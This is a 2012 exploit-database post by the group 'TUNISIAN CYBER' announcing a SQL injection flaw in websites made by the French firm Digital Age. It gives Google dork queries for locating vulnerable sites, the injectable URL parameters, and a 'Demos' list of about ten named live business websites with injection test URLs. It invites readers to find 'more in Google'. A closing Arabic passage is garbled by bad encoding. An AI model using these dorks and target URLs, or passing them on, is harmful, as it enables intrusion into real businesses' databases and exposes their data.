Digital Age based sites suffer from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
65865b41035f0e109ed0ff69fb318c3c7b2d7a540a87c9053f391c980ad7e987
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm TUNISIAN CYBER member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Author: TUNISIAN CYBER
[+] Home: 1337day.com Inj3ct0r Exploit DataBase
[+] Exploit Title: Digital Age SQL Injection Vulnerability
[+] Date: 16-09-2012
[+] Category: WebApp
[+] Google Dork: intext:"Réalisé par Safe & Web Company (((( Digital Age ))))"
intext:"Réalisé par Safe & Web Company (((( Digital Age ))))" .php?id=
intext:"Réalisé par Safe & Web Company (((( Digital Age ))))" .php?cat=
[+] Tested on: Windows 7 Professionnel / Windows Server 2008
[+] Vendor: http://www.digitalage.fr/
####################################################################################
#################################################################################
||| ~~ Use It At Your Own Risk ~~ |||
||| It's For Educational Purpos Only |||
||| I'm not Responsible For Any Damage |||
#################################################################################
Examples
127.0.0.1/details_produits.php?id=[SQLi]
127.0.0.1/materiaux.php?cid=[SQLi]
#################################################################################
Demos:
http://www.gd-concept-agencement.com/details.php?id=2'
http://www.millionpereetfils.com/details_produits.php?id=33'
http://sobeloc.com/details.php?id=24'
http://www.amenagement-mobilier-bureau-21.com/realisations.php?cat=26'
http://www.taille-pierre-41.com/materiaux.php?cid=2'
http://www.garage-vincent-18.com/fiche.php?id=83'
http://www.horticulture-passion-49.com/fleurs-details.php?id=36'
http://www.pub-oflahertys.com/nos-soirees-det.php?id=7'
http://www.restaurant-pizzeria-cotepatio.fr/actualite.php?id=4'
http://www.espace-beaute-79.com/actualites.php?id=1'
More in Google =)
áÇ Çáå ÇáÇ Çááå ãÍãÏÇ ÚÈÏå æÑÓæáå
æÃäÒá ÚÞÇÈÇ ÃáíãÇ Úá ßá ãä íÊØÇæá Úáì ÇáÅÓáÇã æÇáãÓáãíä
ÑÍã Çááå ßá ãä ÊæÝì
./3nD
########################################################################################
Greets to: TN H4CK3RZ( Badi - xMax-tn - Silent_hill - pipo issam - anas laribi - xtech set) , r00tw0rm members and Inj3ct0r Team
###########################################################################################